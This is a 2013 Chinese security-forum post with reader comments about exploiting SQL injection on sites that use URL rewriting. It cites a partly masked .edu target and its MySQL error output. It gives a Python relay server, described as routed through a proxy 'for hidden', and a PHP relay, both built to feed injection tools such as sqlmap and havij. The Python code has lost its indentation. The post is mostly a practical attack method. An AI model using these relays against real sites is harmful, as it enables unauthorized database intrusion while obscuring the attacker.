python脚本处理伪静态注入

livers 2013-05-27 17:50:00

目前有很多网站做了rewrite.

/?id=1

/1

/1111.php

通常情况下,动态脚本的网站的url类似下面这样 http://www.xxoo.net/aa.php?id=123 做了伪静态之后类似这样 http://www.xxoo.net/aa.php/id/123.html 总归大趋势下,攻击的门槛逐渐增高。这样有利有弊,喜欢研究的会深入钻研,另一方面只会用工具不懂原理的则充斥到大小论坛水区。实战举例:

http://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1

这个点存在注入

Error Number: 1064

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1dddddd, 1' at line 4

标准的显错注入。 这里测试了几个工具havijhttp://www.bxxxxxxxxxxxx.edu/magazine/index.php/mxxxxia/gallery/dickinsons-last-dance/1sqlmap safe3 穿山甲 此上都无法直接注入。 这里借助注入中转实现: 中转工具有一些   win7下会遭遇各种奇葩问题。并linux下不能使用。 用python  code了一篇,为什么用python 因为他开发快,不用各种环境。

from BaseHTTPServer import *  
import urllib2  
class MyHTTPHandler(BaseHTTPRequestHandler):  
def do_GET(self):  
path=self.path  
path=path[path.find('id=')+3:]  
proxy_support = urllib2.ProxyHandler({"http":"http://127.0.0.1:8087"})  
opener = urllib2.build\_opener(proxy\_support)  
urllib2.install_opener(opener)  
url="http://www.xxxxxxxxxxxxx.edu/magazine/imedia/gallery/dickinsons-last-dance/"  
try:  
response=urllib2.urlopen(url+path)  
html=response.read()  
except urllib2.URLError,e:  
html=e.read()  
self.wfile.write(html)  
server = HTTPServer(("", 8000), MyHTTPHandler)  
server.serve_forever()

不到20行代码(并加入了 goagent代理for hidden )。 已经实现了要求。http://127.0.0.1:8000/?id=1从而达到目的。相比构造自己脚本去执行sql注入语句,要高效的多。

给习惯用php的朋友添加一个php脚本的中转注入: 可以自定义需要的头信息,在需要cookie或者refer等位置都可以方便的添加,添加好后直接访问zhongzhuan.php?id=1然后就可以放到工具中注入了,十分方便 :)

<?php
set_time_limit(0); 
$id=$_GET["id"]; 
$id=str_replace(" ","%20",$id); 
$id=str_replace("=","%3D",$id); 
$cookie="test";
$url = "http://www.qq.com/index.php/id/{$id}.html"; 
//$postdata = "";

$ch = curl_init(); 
curl_setopt($ch, CURLOPT_URL, "$url"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
curl_setopt($ch, CURLOPT_COOKIE, "$cookie");
// curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
// curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);//post的数据
$output = curl_exec($ch); 
curl_close($ch); 
print_r($output);
?>

评论

D

Demon 2013-05-30 17:38:10

这python代码缩进都没。。看的头疼

1

10457793 2013-06-18 11:29:29

好厉害

乌拉拉 2013-07-12 17:06:08

havij用 %Inject_Here%了没

酱油甲 2013-08-26 17:40:02

sqlmap可以指定位置进行注入,不一定要参数

黄小昏 2013-09-26 09:34:52

马克

路人甲 2014-08-06 17:08:55

mark

B

BeenQuiver 2015-01-21 13:53:28

好工具

枯荣 2015-08-06 10:36:51

mark

I

iPython 2016-01-06 13:50:25

from BaseHTTPServer import *
看着这种也头疼

L

livers

mov esp,0 jmp esp crash.....

twitter weibo github wechat

随机分类

逆向安全 文章:70 篇
Ruby安全 文章:2 篇
安全管理 文章:7 篇
后门 文章:39 篇
二进制安全 文章:77 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录